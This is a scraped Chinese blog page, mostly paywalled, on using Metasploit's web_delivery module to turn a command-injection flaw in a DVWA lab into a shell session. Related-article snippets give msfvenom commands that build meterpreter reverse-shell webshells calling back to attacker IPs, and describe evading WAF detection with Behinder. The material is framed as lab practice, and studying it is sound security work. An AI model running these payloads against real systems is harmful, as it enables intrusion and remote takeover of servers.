MSF-从webshell到完全控制

最新推荐文章于 2025-06-02 13:32:35 发布

scrawman

最新推荐文章于 2025-06-02 13:32:35 发布

阅读量1.1k

点赞数

CC 4.0 BY-SA版权

文章标签： metasploit

本文链接：https://blog.youkuaiyun.com/scrawman/article/details/112772138

文章目录

一、访问web站点，寻找漏洞
二、利用thinkphp 5.1漏洞
题外话

一、访问web站点，寻找漏洞

示例是在DVWA上的Command injection部分在low级别下进行的
在这里插入图片描述

当受害者主机存在比如命令注入、远程命令执行等问题时，攻击者可以利用web_delivery生成的一条命令建立连接。web_delivery支持php/python/powershell多种脚本。

进入msf，search web_delivery，选择

use exploit/multi/script/web_delivery

其默认脚本语言是python，如果要更换脚本语言可以show targets查看可以更换的语言的代号
在这里插入图片描述

set lhost = Your IP Address
set lport = Your Port
运行以后它会生成一条指令，只要目标机器运行这条指令我们就能建立session

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

scrawman

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

msf生成webshell攻击服务器

afei001

03-22

1070

实验环境攻击机：kali IP：192.168.3.157 靶机：win 10（已搭建WAMP）生成Webshell攻击服务器 1.在kali上生成Webshell Payload root@afei:~# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.3.157 lport=5555 -f raw > shel...

msf生成webshell_msf 之 webshell 提权

weixin_39623411的博客

12-22

467

首先建议一下到网上查查meterpreter的用法在看这篇文章，理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具，这两个工具不但可以生成exe 型后门，一可以生成网页脚本类型的webshell ，通过生成webshell 然后设置监听器，访问webshell的url，幸运的话可以产...

1 条评论您还未登录，请先登录后发表或查看评论

msf生成webshell_Metasploit 之使用socket通信的webshell简单分析

weixin_39693193的博客

12-22

398

Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式：socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...

从webshell管理工具(蚁剑冰蝎哥斯拉菜刀哥斯拉等)程控制主机后，再将这个控制能力上线到MSF 为什么要这么做了？一篇文章告诉你

最新发布

浩策盾悟

06-02

1万+

内网渗透 - 横向移动场景：通过蚁剑控制边界Web服务器，需要扫描内网其他主机。上线原因：Metasploit的和portscan模块更高效。案例：如蚁剑案例所述。挂马后提权场景：通过挂马植入菜刀Webshell，当前权限为普通用户。上线原因：Metasploit的提权模块（如getsystem）更强大。案例：如菜刀案例所述。规避检测场景：冰蝎Webshell被WAF频繁拦截。上线原因：Metasploit的加密通信更隐蔽。案例：如冰蝎案例所述。复杂任务执行场景。

msf生成webshell_MSF之Web渗透

weixin_36212560的博客

01-13

933

WebShellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=3333 -f raw -o a.php 生成a.phpmsf > use exploit/multi/handlermsf exploit(handler) > set payload php/meterpr...

weevely混淆webshell联动msf

灰太的表格的博客

06-15

590

weevely混淆webshell的联合msf 生成可以看到有两个参数，分别对应着进行混淆的两种方式。我们分别来试一下整理一下代码稍后分析下混淆过程：利用将混淆后的webshell进行上传，并进行连接，会传回一个交互式的shell 常用命令： :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd

msf生成webshell_生成常用的msf

weixin_39759441的博客

12-22

847

msf作为一款强大的漏洞检测工具，如何生成适用于msf的payload以及如何利用是使用msf的关键，今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom，下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表：msfvenom -l生成二进制文件关于二进制文件，主要介绍适用于Windows、linux、ma...

msf生成webshell_Metasploit之webshell提权

weixin_39584549的博客

12-22

712

本文所涉及的方法只能在已授权的机器上做测试。首先建议一下到网上查查meterpreter的用法在看这篇文章，理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具，这两个工具不但可以生成exe 型后门，一可以生成网页脚本类型的webshell ，通过生成webshell 然后设置监听器，访...

msf生成webshell_Metasploit之使用socket通信的webshell简单分析

weixin_39606799的博客

12-22

329

感谢y3p投递0x01 前言常规的webshell都是调用该语言中习惯函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式：socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程。例如使用msf中：msfpayload php/reverse_php LHOST=自己的IP LPORT=端口 R > sha...

CVE 2017-10271漏洞复现(写入webshell)

BROTHERYY的博客

10-14

1258

1.简介 Weblogic是oracle推出的application server，由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性，备受广大系统管理员的青睐 2.复现环境可自建也可以使用vulhub和docker快速搭建环境 3.漏洞复现访问http://IP:7001/，看到一个not found页面即启动成功漏洞触发的位置是在wls-wsat/CoordinatorPortType这个目录下，访问该目录进行截获数据包，修改为POST传递参数，写入成功后，访问

MSF建立webshell后门，并监听端口建立session连接

土拨鼠挖洞中的博客

06-23

1万+

一建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注：生成的反弹木马存放在当前用户home目录下；将生成的木马上传到目标机中，可以远程访问；windows下asp反弹木马：root@kali:~# msfvenom -p windows/meterpret...

metasploit自动化渗透攻击模块

11-18

metasploit自动化渗透攻击模块db_autopwn

msf 之 webshell 提权

weixin_30686845的博客

03-01

407

首先建议一下到网上查查meterpreter的用法在看这篇文章，理解为什么要使用msf来提权（因为msf里边有个meterpreter很强大 ^_^）Metasploit 拥有msfpayload 和msfencode 这两个工具，这两个工具不但可以生成exe 型后门，一可以生成网页脚本类型的webshell ，通过生成webshell 然后设置监听器，访问webshell的url，幸运的话可以产...

msf生成webshell_CVE-2017-11882漏洞复现结合MSF拿电脑shell

weixin_32139875的博客

01-16

539

两个代码分别贴上[Python] 纯文本查看复制代码import argparseimport sysRTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkin...

webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)

热门推荐

黄乔国PHP

03-22

1万+

冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端，由于通信流量被加密，传统的WAF、IDS 设备难以检测，给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密，且加密密钥是由随机数函数动态生成，因此该客户端的流量几乎无法检测。在流量层，冰蝎的aes特征一直是厂商查杀的重点，在主机层，aes相关的API也是一个强特征。既然是特征，那就一定存在一个一成不变的常量，那我们就把这个特征泛化一下，让他成为变量。为了一劳永逸解决这个问题，

kali攻防第13章 Metasploit之生成webshell及应用

安全参透之旅

12-24

6486

Metasploit之生成webshell及应用准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasploit 步骤： 1、在msf生成asp脚本木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.

使用MSF进行提权（windows提权、linux提权、wesng使用

喜欢Python编程的程序员柚柚呀

02-29

1424

安全焦点，其BugTraq是一个出色的漏洞和exploit数据源，可以通过CVE编号，或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器（靶机）C:\RECYCLER\s.exe 目录（因为一般C:\RECYCLER\ 目录都有读写权限）选定需要使用的攻击模块之后，你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用，将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣，这将非常有用。为此，可以分别使用。

Thinkphp5.0.23远程命令执行

Cover-3321的博客

01-03

2686

thinkphp远程命令执行漏洞 php的一个开发框架，5,0.23及以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用request类任意方法，构造payload,导致远程命令执行

thinkphp漏洞复现

zzf011900的博客

04-02

1621

thinkphp 远程命令执行漏洞php的一个开发框架，5.0.23及以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用request类任意方法，构造payload，导致远程命令执行。浏览器访问:http://192.168.59.10:8080/index.php?Rce 恶意构迷的语句在服务器(系统)上执行，从而达到黑客控制服务器的目的。浏览器访问:http://192.168.59.10:8080/函数:一串按照顺序和一定逻辑执行的代码。MSF实现直接获取权限原理。